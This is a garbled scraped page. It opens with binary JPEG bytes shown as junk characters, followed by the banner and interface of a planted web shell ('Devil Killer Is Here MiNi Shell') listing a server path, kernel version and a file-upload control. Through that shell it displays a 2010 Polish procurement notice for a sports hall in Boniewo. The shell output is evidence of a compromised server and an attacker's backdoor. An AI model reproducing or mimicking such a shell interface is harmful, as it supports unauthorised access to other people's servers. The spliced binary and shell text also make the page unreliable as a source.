JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/192254-N-2010.html

<p class="kh_header"><b>Boniewo: Budowa hali sportowo-widowiskowej z infrastrukturą techniczną w miejscowości Boniewo</b><br>
<b>Numer ogłoszenia: 192254 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boniewo , ul. Szkolna 28, 87-851 Boniewo, woj. kujawsko-pomorskie, tel. 054 2840124, faks 054 284 0671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.boniewo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali sportowo-widowiskowej z infrastrukturą techniczną w miejscowości Boniewo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa hali sportowo-widowiskowej z infrastrukturą techniczną  w miejscowości Boniewo.
Wymiary hali : szerokość 38,94 m , długość 30,84 m. Wysokość 11,98m  .  Kubatura obiektu 12 896,044 m3.   

w następującym zakresie
I etap zadania:
a/ Wykonanie sieci sanitarnych zewnętrznych:
     - wykonanie przyłącza wody,
     -  demontaż istniejących sieci kanalizacyjnych i likwidacja przepompowni,
      - Wykonanie przepompowni i przyłącza kanalizacyjnego,
      - inwentaryzacja powykonawcza.
b/ Roboty budowlane :
- roboty ziemne 
- fundamenty,
- warstwy podposadzkowe, 
- zbrojenie betonu,
- Konstrukcje żelbetowe.
 
Szczegółowy zakres zadania zawarty został w przedmiarach robot oraz specyfikacjach technicznych wykonani i odbioru robót, stanowiących załącznik do SIWZ i będących integralną częścią  SIWZ.

II etap zadania :
Roboty budowlane:
- ściany zewnętrzne,
- ściany wewnętrzne,
- dach.

Szczegółowy zakres zadania zawarty został w przedmiarach robot oraz specyfikacjach technicznych wykonani i odbioru robót, stanowiących załącznik do SIWZ i będących integralną częścią  SIWZ.

III etap zadnia :

Roboty budowlane
- ślusarka  zewnętrzna,
- ślusarka i stolarka drzwiowa,
 - ocieplenie ścian,
- tynki i okładziny,
- malowanie i licowanie,
- posadzki,
- sufity,
- wyposażenie dodatkowe,
- schody zewnętrzne i podjazd dla osób niepełnosprawnych,
- opaska wokół budynku,
- nagłośnienie hali,
- wewnętrzna instalacja ciepła technologicznego i C.O,
- wewnętrzna instalacja wodno-kanalizacyjna,
- wewnętrzna instalacja wentylacyjna,
- instalacje elektryczne wewnętrzne ,
-zagospodarowanie terenu- place komunikacyjne , zieleń
- wyposażenie hali z montażem,
- inwentaryzacja powykonawcza,
- tablica informacyjna o współfinansowaniu z budżetu Województwa Kujawsko-Pomorskiego zgodnie z otrzymanymi wytycznymi. 

Szczegółowy zakres zadania zawarty został w przedmiarach robot oraz specyfikacjach technicznych wykonani i odbioru robót, stanowiących załącznik do SIWZ i będących integralną częścią  SIWZ.
Wyposażenie hali  z montażem urządzeń  . Wykonawca zobowiązany jest do dostarczenia atestów oraz certyfikatów bezpieczeństwa na wszystkie wymienione poniżej urządzenia.

1.	Koszykówka Główna na boisko centralne 1 komplet z montażem;

a/ Konstrukcja podwieszana z napędem  elektrycznym z montażem   certyfikat bezpieczeństwa B i  PZK-osza sztuk 2
b/Mechanizm regulacji wysokości tablicy 105x180 cm w zakresie  305-260 cm, certyfikat  bezpieczeństwa B sztuk 2
c/ Tablica do koszykówki profesjonalna, szkło akrylowe o wymiarach 105x180 cm o Gru. 10 mm, na remie metalowej, certyfikat  bezpieczeństwa B sztuk 2
d/ Osłona dolnej krawędzi tablicy 105x180 cm certyfikat  bezpieczeństwa B, sztuk 2 
e/ Obręcz do koszykówki uchylna z siłownikami gazowymi, certyfikat  bezpieczeństwa B, sztuk 2 
f/ Siatka do obręczy turniejowa, sznur 5 mm sztuk 2 


2.	Koszykówka dwa boiska treningowe z montażem: 

a/ Konstrukcja do koszykówki uchylna składana w bok na ścianę, wysięg L=120cm, z montażem ,mocowana  bezpośrednio do słupa certyfikat  bezpieczeństwa B, sztuk 4,
b/ Mechanizm regulacji wysokości tablicy 105x180 cm w zakresie 305-260 cm, certyfikat  bezpieczeństwa B, sztuk 4,
c/ Tablica do koszykówki profesjonalna, szkło akrylowe o wymiarach 105x180 cm o Gru. 10 mm, na remie metalowej, certyfikat  bezpieczeństwa B sztuk 4
d/ Osłona dolnej krawędzi tablicy 105x180 cm certyfikat  bezpieczeństwa B sztuk 4
e/ Obręcz do koszykówki uchylna z siłownikami gazowymi, certyfikat  bezpieczeństwa B, sztuk 4 
f/ Siatka do obręczy turniejowa, sznur 5 mm sztuk 4

3.	Siatkówka - boisko główne z montażem :

a/ Słupki do siatkówki aluminiowe owalne wielofunkcyjne z płynną regulacją wysokości , montaż ,certyfikat  bezpieczeństwa B, 1 kop,
b/ Tuleja montażowa słupka aluminiowego z montażem -sztuk  2,
c/ rama podłogowa z deklem sztuk 2 ,
d/ Osłony słupków do siatkówki profesjonalne(gąbka o grubości 5 cm pokryta skadenem na  konstrukcji wzmacniającej ) zapinana na rzepy, certyfikat  bezpieczeństwa B, kpl 1
e/ Siatka do siatkówki turniejowa z atenkami, obszyta z czterech stron taśma certyfikat  bezpieczeństwa B, sztuk 1,
f/ wieszak na siatkę sztuk 1,
g/ Stanowisko sędziowskie do siatkówki z regulacją wysokości podestu, oparciem i podstawką do  pisania certyfikat  bezpieczeństwa B, sztuk 1,

4. Siatkówka - 2 boiska treningowe( poprzeczne) z montażem: 

a/ Słupki do siatkówki aluminiowe owalne wielofunkcyjne z płynną regulacją wysokości , montaż ,certyfikat  bezpieczeństwa B, 1 kop,
b/ Tuleja montażowa słupka aluminiowego z montażem -sztuk  4,
c/ rama podłogowa z deklem sztuk 4 ,
d/ Osłony słupków do siatkówki profesjonalne(gąbka o grubości 5 cm pokryta skadenem na  konstrukcji wzmacniającej ) zapinana na rzepy, certyfikat  bezpieczeństwa B, kpl 1
e/ Siatka do siatkówki turniejowa z atenkami, obszyta z czterech stron taśma certyfikat  bezpieczeństwa B, sztuk 2,
f/ wieszak na siatkę sztuk 2,

4.	Tenis ziemny- boisko główne z montażem :

a/ Słupki do tenisa profesjonalne owalne z wewnętrznym naciągiem siatki- 1 para certyfikat  bezpieczeństwa B,
b/ Tuleja słupka do tenisa z montażem - 2 sztuki,
c/ Rama podłogowa z deklem z montażem  - 2 sztuki,
d/ siatka profesjonalna do tenisa ziemnego z fartuchem-1 sztuka certyfikat  bezpieczeństwa B
e/ Stanowisko sędziowskie do tenisa -1  sztuka certyfikat  bezpieczeństwa B,


5.	Piłka ręczna boisko główne z montażem :

a/ Bramki do piłki ręcznej z montażem profesjonalne aluminiowe( 2,00x3,00) z łukami składanymi, mocowane do posadzki na talerzykach, demontowane, 1 para certyfikat  bezpieczeństwa B,
b/ siatki do piłki ręcznej turniejowe z piłkochwytem  grubości splotu siatki 4-5 mm, -1 para certyfikat  bezpieczeństwa B,
 

6.	Drabinki gimnastyczne H-3,0 m mocowane pomiędzy filarami- 8 kompletów (2II+1L) z montażem :

a/ Drabinka gimnastyczna przyścienna 180X 300 cm- podwójna z montażem  -16 sztuk certyfikat  bezpieczeństwa B,
b/ Drabinka gimnastyczna przyścienna 90X 300 cm- pojedyńcza z montażem  -8  sztuk certyfikat  bezpieczeństwa B

7.	Piłkochwyty na ściany szczytowe z montażem :

a/ siatka ochronna na ściany szczytowe, wymiary  22x7,4m- 2  sztuki, oczka 100x100mm grubości splotu 2-3 mm, kolor do wyboru niebieski, zielony, żółty, czerwony-325,6 m2 Drabinka gimnastyczna przyścienna 180X 300 cm- podwójna z montażem  -16 sztuk certyfikat  bezpieczeństwa B

8.	Drążek gimnastyczny wolnostojący - 1 komplet z montażem:

a/ Drążek gimnastyczny uniwersalny wolnostojący polowy, bez odciągowy z regulacją wysokości poprzecznej co 10 cm certyfikat  bezpieczeństwa B- 1 komplet,
b/ Tuleja montażowa drążka- 2 sztuki,
c/ rama podłogowa z deklem- 2 sztuki,

9.	Kotara grodząca z napędem elektrycznym podnoszona pionowa z montażem - 1 sztuka (podział na dwa sektory):

a/ Kotara grodząca tkanina + siatka, wymiary 20x7,5m -1  sztuka. Do wysokości 3,0 materiał nieprzezroczysty lub przezroczysty, powyżej siatka o oczkach 4x4 cm lub 10x10cm. Kolory  siatek i tkanin, certyfikat  bezpieczeństwa B,- 150 m2,
b/ Konstrukcja do pionowego podnoszenia i opuszczania kotary, mocowana bezpośrednio do dźwigara(podział 4,4 certyfikat  bezpieczeństwa B- 1 komplet 

10.	Tablica wyników sportowych profesjonalna -DTS 160 Profil z montażem:

a/ Tablica wyników sportowych DTS 160 Profi, wymiary 220x125x10cm, sterowanie przewodowe, tablica główna(zegar-czas, wynik setpołowa, stan setówfaul,syrena), 2 osobne zegary 24 sek 50x40x10 cm, pulpit sterowniczy +2 manipulatory, wysokość cyfr 220 i 125 mm- widoczność 60m, certyfikat  bezpieczeństwa na podzespoły- 1 komplet,

11.	Wyposażenie szatni:

a/ ławko-wieszak do szatni jednostronny certyfikat  bezpieczeństwa B- 16 mb

      12.Siedziska na trybuny :

a/ Siedziska na trybuny  SO-05 z oparciem o wysokości 25 cm, wykonanie trudno zapalne montowane bezpośrednio do stopnia (do płyty OSB na konstrukcji stalowej)z montażem - atesty- 150 sztuk 

13.	Wyposażenie gimnastyczne:

Ławeczki gimnastyczne z nogami metalowymi
a/ ławeczki gimnastyczne- dł. 2,0m - 1 sztuka ,
b/ ławeczki gimnastyczne- dł. 2,5m - 2sztuka,
c/ ławeczki gimnastyczne- dł. 3,0m - 1 sztuka,
d/ ławeczki gimnastyczne- dł. 4,0m - 1 sztuka.

Wyposażenie gimnastyczne ruchome:

a/ Odskocznia gimnastyczna treningowa - 1 sztuka,
b/ Skrzynia gimnastyczna 5-częściowa z wózkiem pokrycie skóra naturalna- 1 sztuka 
c/ Kozioł gimnastyczny z regulacją wysokości, pokrycie  syntetyczne- 1 komplet ,
d/ równoważnia gimnastyczna dł. 5m z regulacją wysokości 80-120cm, 2 wózki do  transportu- 1 komplet , 


Materace gimnastyczne:
a/ materac gimnastyczny200x120x5cm- 1 sztuka,
b// materac gimnastyczny200x120x10cm- 1 sztuka,
c/ materac gimnastyczny200x120x20cm- 1 sztuka,

Ścieżki gimnastyczne:

a/ ścieżki gimnastyczne rolowana, grubości 25mm, szerokości 2m- 1 m2,
b/ ścieżki gimnastyczne rolowana, grubości 35mm, szerokości 2m- 1 m2

Materace ochronne:

a/ materace ochronne na ścianę i slupy, grubości materaca 5 cm, konstrukcja ze sklejki 0,5 cm, metraż liczony po zewnętrznej stronie- 1 m2,

Skok wzwyż :

a/ stojak do skoku wzwyż szklony- 1 komplet,
b/ Stojak do skoku wzwyż profesjonalny IAAF- 1 komplet,
c/ poprzeczka do skoku wzwyż- aluminiowa- 1 sztuka,
d/poprzeczka do skoku wzwyż- włókno szklane, wyczynowa, IAAF-1  sztuka,
e/ materac gimnastyczny zeskokowy 300x200x45 cm- 2 sztuki,
f/ kołderka do materaca zeskokowego 300x200x5cm- 1 sztuka.

Pozostały sprzęt:

a/Kompresor do pompowania piłek- 1 sztuka,
b/ siatki do piłek- 10 sztuk,
c/ Wózek na materace  l=200cm,B=100 cm, Qmax=250 kg- 1 sztuka 
d/ Atlas Masters Sport MEGA ITNESS 4- stanowiskowy - 1 sztuka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.25-9, 45.00.00.00-7, 45.33.00.00-9, 45.31.00.00-3, 45.31.60.00-5, 45.33.24.00-7, 45.11.12.91-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta  winna być zabezpieczona  wadium w wysokości 

50.000 słownie  pięćdziesiąt  tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy ,którzy spełniają warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2) posiadają  wiedzę i doświadczenie,
3) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4)znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia. 
5) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

 Ocena spełnienia warunków w postępowaniu o zamówienie publiczne. Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia,  nie spełnia
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się: 1) wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 i 2  Prawa zamówień publicznych 2). Zamawiający  zawiadomi równocześnie wykonawców, którzy zostali wykluczeni z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne, z zastrzeżeniem art.92 ust.1 pkt3.
3).Ofertę wykonawcy wykluczonego uznaje się za odrzuconą</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga Wykazu robót budowlanych w zakresie niezbędnym  do wykazania spełnienia warunku wiedzy i doświadczenia, wykonywanych w okresie ostatnich  5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz  załączeniem dokumentów potwierdzających  że  roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Zamawiający wymaga udokumentowania  minimum dwóch robót 
odpowiadających zakresem przedmiotowi  zamówienia. 
Ocena spełnienia warunków w postępowaniu o zamówienie publiczne. Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia,  nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagany personel:
a/ osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej  będąca członkiem właściwej izby samorządu zawodowego
b/  osoba posiadająca uprawnienia budowlane do kierowania robotami instalacyjno-inżynieryjnymi w zakresie instalacji wodociągowych i kanalizacyjnych, będąca członkiem właściwej izby samorządu zawodowego,
c/ osoba posiadająca uprawnienia budowlane do kierowania robotami instalacyjno-inżynieryjnymi w zakresie instalacji  elektrycznych, będąca członkiem właściwej izby samorządu zawodowego
Ocena spełnienia warunków w postępowaniu o zamówienie publiczne. Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia,  nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga: 
Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytowa wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert.

 Opłaconej polisy, w a przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej zakresie  prowadzonej działalności związanej z przedmiotem zamówienia


Ocena spełnienia warunków w postępowaniu o zamówienie publiczne. Przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą : spełnia,  nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

